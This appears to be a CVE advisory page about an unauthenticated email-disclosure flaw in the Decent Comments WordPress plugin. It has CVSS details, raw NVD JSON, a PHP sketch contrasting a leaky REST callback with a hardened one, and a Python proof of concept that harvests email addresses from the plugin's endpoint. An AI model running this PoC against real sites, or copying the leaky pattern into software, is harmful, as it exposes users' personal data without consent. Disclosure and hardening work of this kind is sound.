Security Vulnerability Report
CVE-2026-7385 CVSS 5.8 MEDIUM

CVE-2026-7385

Published: 2026-05-20 07:16:16
Last Modified: 2026-05-20 18:16:28

Description

The Decent Comments WordPress plugin before 3.0.2 does not restrict access to comment author email addresses and post author email addresses via its REST API endpoint, allowing unauthenticated attackers to enumerate registered user email addresses.
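
The description names a common WordPress REST API mistake: a route that is legitimately public (comment text is public) but whose callback serializes email addresses for every caller, so no authentication is needed to harvest them. The following is an added illustration of that bug class beside one way to fix it. It is not the Decent Comments plugin's code and not from the original advisory; the namespace example-comments/v1, the route, the field names and the capability checks are assumptions chosen to mirror how WordPress core gates the same fields on its own /wp/v2/comments and /wp/v2/users routes.

```php
<?php
/**
 * Added illustration for the bug class in CVE-2026-7385. This is NOT the
 * Decent Comments plugin's code: the namespace 'example-comments/v1', the
 * route, the field names and the capability checks are all assumptions.
 */

// Serialize one comment for the REST response. The two flags decide whether
// the comment author's address and the post author's (a registered user's)
// address are included in the output.
function example_serialize_comment( WP_Comment $c, bool $expose_comment_email, bool $expose_user_email ): array {
    $item = array(
        'id'      => (int) $c->comment_ID,
        'post'    => (int) $c->comment_post_ID,
        'author'  => $c->comment_author,
        'content' => $c->comment_content,
    );
    if ( $expose_comment_email ) {
        $item['author_email'] = $c->comment_author_email;
    }
    if ( $expose_user_email ) {
        $post_author_id            = (int) get_post_field( 'post_author', $c->comment_post_ID );
        $item['post_author_email'] = get_the_author_meta( 'user_email', $post_author_id );
    }
    return $item;
}

// Vulnerable pattern. A public route with 'permission_callback' => '__return_true'
// is fine for comment text, but this callback unconditionally includes both
// email fields, so any unauthenticated GET receives them.
function example_comments_leaky( WP_REST_Request $request ) {
    $items = array();
    foreach ( get_comments( array( 'status' => 'approve', 'number' => 20 ) ) as $c ) {
        $items[] = example_serialize_comment( $c, true, true );
    }
    return rest_ensure_response( $items );
}

// Hardened pattern. Emails are treated as edit-context data, as WP core does:
// comment author emails require 'moderate_comments', registered users' emails
// require 'list_users'. For an anonymous REST request current_user_can() is
// false for both, so the fields are simply absent from the response.
function example_comments_hardened( WP_REST_Request $request ) {
    $expose_comment_email = current_user_can( 'moderate_comments' );
    $expose_user_email    = current_user_can( 'list_users' );
    $items = array();
    foreach ( get_comments( array( 'status' => 'approve', 'number' => 20 ) ) as $c ) {
        $items[] = example_serialize_comment( $c, $expose_comment_email, $expose_user_email );
    }
    return rest_ensure_response( $items );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'example-comments/v1', '/comments', array(
        'methods'             => WP_REST_Server::READABLE,
        // Point this at example_comments_leaky to reproduce the disclosure.
        'callback'            => 'example_comments_hardened',
        'permission_callback' => '__return_true',
    ) );
} );
```

Note that the permission_callback is not where this bug lives: returning true there is correct for a public listing. The check belongs per field, at serialization time, against the capability that protects that field elsewhere in WordPress. The practical test against a deployed site is the same either way: an unauthenticated GET to the route should return comment text but no author_email or user email values.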

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Decent Comments < 3.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def poc(target_url):
    """
    Proof of Concept for CVE-2026-7385.
    Attempts to enumerate user emails via the vulnerable REST API endpoint.
    """
    # The specific endpoint might vary; it commonly follows the pattern
    # /wp-json/decent-comments/v1/comments or a similar structure based on
    # the plugin's route registration.
    api_endpoint = "/wp-json/decent-comments/v1/comments"
    full_url = f"{target_url.rstrip('/')}{api_endpoint}"
    headers = {
        "User-Agent": (
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
            "(KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
        )
    }
    try:
        response = requests.get(full_url, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request successful to {full_url}")
            data = response.json()
            emails = set()
            # Extract emails assuming the response is a list of comment objects
            if isinstance(data, list):
                for item in data:
                    if not isinstance(item, dict):
                        continue
                    # Check common fields for email addresses
                    for field in ("author_email", "email", "user_email"):
                        if item.get(field):
                            emails.add(item[field])
            if emails:
                print(f"[+] Found {len(emails)} unique email addresses:")
                for email in sorted(emails):
                    print(f" - {email}")
            else:
                print("[-] No emails found in response. Structure might be different or endpoint patched.")
                print("Response snippet:", str(data)[:200])
        else:
            print(f"[-] Failed to retrieve data. Status Code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    target = "http://example-wordpress-site.com"  # Replace with actual target
    poc(target)

References

WPScan advisory: https://wpscan.com/vulnerability/1c5949d0-cf50-45d3-a7e2-2f94cdb42405/

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-7385",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-20T07:16:16.353",
    "lastModified": "2026-05-20T18:16:27.673",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Decent Comments WordPress plugin before 3.0.2 does not restrict access to comment author email addresses and post author email addresses via its REST API endpoint, allowing unauthenticated attackers to enumerate registered user email addresses."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
            "baseScore": 5.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/1c5949d0-cf50-45d3-a7e2-2f94cdb42405/",
        "source": "[email protected]"
      }
    ]
  }
}